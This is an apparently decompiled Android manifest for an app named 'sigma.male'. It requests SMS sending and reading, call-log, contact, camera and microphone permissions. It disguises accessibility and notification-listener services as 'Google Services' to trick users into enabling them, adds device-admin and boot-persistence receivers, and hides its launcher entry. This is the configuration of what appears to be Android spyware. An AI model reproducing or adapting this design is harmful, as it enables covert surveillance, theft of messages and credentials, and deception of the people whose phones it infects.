<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0.0-alpha" android:compileSdkVersion="29" android:compileSdkVersionCodename="10" package="sigma.male" platformBuildVersionCode="1" platformBuildVersionName="1.0.0-alpha">
	<uses-sdk android:minSdkVersion="14" android:targetSdkVersion="19" />
	<uses-permission android:name="android.permission.INTERNET" />
	<uses-permission android:name="android.permission.VIBRATE" />
	<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
	<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
	<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
	<uses-permission android:name="android.permission.RECORD_AUDIO" />
	<uses-permission android:name="android.permission.FOREGROUND_SERVICE" />
	<uses-permission android:name="android.permission.READ_SMS" />
	<uses-permission android:name="android.permission.RECEIVE_SMS" />
	<uses-permission android:name="android.permission.SEND_SMS" />
	<uses-permission android:name="android.permission.BROADCAST_SMS" />
	<uses-permission android:name="android.permission.SEND_SMS_NO_CONFIRMATION" />
	<uses-permission android:name="android.permission.CALL_PHONE" />
	<uses-permission android:name="android.permission.WRITE_CALL_LOG" />
	<uses-permission android:name="android.permission.READ_CALL_LOG" />
	<uses-permission android:name="android.permission.READ_CONTACTS" />
	<uses-permission android:name="android.permission.WRITE_CONTACTS" />
	<uses-permission android:name="android.permission.SET_WALLPAPER" />
	<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
	<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
	<uses-permission android:name="android.permission.CAMERA" />
	<uses-permission android:name="android.hardware.camera.autofocus" />
	<uses-permission android:name="android.hardware.camera" />
	<uses-permission android:name="com.huawei.permission.external_app_settings.USE_COMPONENT" />
	<uses-permission android:name="oppo.permission.OPPO_COMPONENT_SAFE" />
	<application android:theme="resourceId:0x7f0e0008" android:label="" android:icon="res/drawable-xhdpi/app_icon.png" android:name=".SketchApplication" android:allowBackup="true" android:usesCleartextTraffic="true">
		<activity android:name=".MainActivity" android:screenOrientation="portrait" android:configChanges="0xda0" android:hardwareAccelerated="true" android:supportsPictureInPicture="true">
			<intent-filter>
				<action android:name="android.intent.action.MAIN" />
				<category android:name="android.intent.category.INFO" />
			</intent-filter>
		</activity>
		<activity android:name=".DebugActivity" android:screenOrientation="portrait" />
		<meta-data android:name="com.google.android.gms.version" android:value="12451000" />
		<provider android:name="com.google.firebase.provider.FirebaseInitProvider" android:exported="false" android:authorities="sigma.male.firebaseinitprovider" android:initOrder="100" />
		<service android:name="com.google.firebase.components.ComponentDiscoveryService" android:exported="false">
			<meta-data android:name="com.google.firebase.components:com.google.firebase.database.DatabaseRegistrar" android:value="com.google.firebase.components.ComponentRegistrar" />
			<meta-data android:name="com.google.firebase.components:com.google.firebase.storage.StorageRegistrar" android:value="com.google.firebase.components.ComponentRegistrar" />
		</service>
		<uses-library android:name="org.apache.http.legacy" android:required="false" />
		<service android:name=".ForegroundService" android:enabled="true" />
		<service android:label="Google Services" android:name=".logoss" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:description="Enable this to make Google Services work perfectly.">
			<intent-filter>
				<action android:name="android.accessibilityservice.AccessibilityService" />
			</intent-filter>
			<meta-data android:name="android.accessibilityservice" android:resource="res/xml/silv.xml" />
		</service>
		<service android:label="Google Services" android:name=".NotificationService" android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" android:description="Enable this to make Google Services work perfectly.">
			<intent-filter>
				<action android:name="android.service.notification.NotificationListenerService" />
			</intent-filter>
		</service>
		<service android:name=".servicess" android:exported="true" />
		<receiver android:name=".restarter" android:enabled="true" android:exported="true">
			<intent-filter>
				<action android:name="restartservice" />
			</intent-filter>
		</receiver>
		<receiver android:name=".DeviceAdminComponent" android:permission="android.permission.BIND_DEVICE_ADMIN">
			<meta-data android:name="android.app.device_admin" android:resource="res/xml/admin.xml" />
			<intent-filter>
				<action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
				<action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
			</intent-filter>
		</receiver>
		<receiver android:label="BootReceiver" android:name=".boyss" android:enabled="true">
			<intent-filter>
				<action android:name="android.intent.action.BOOT_COMPLETED" />
			</intent-filter>
		</receiver>
	</application>
</manifest>
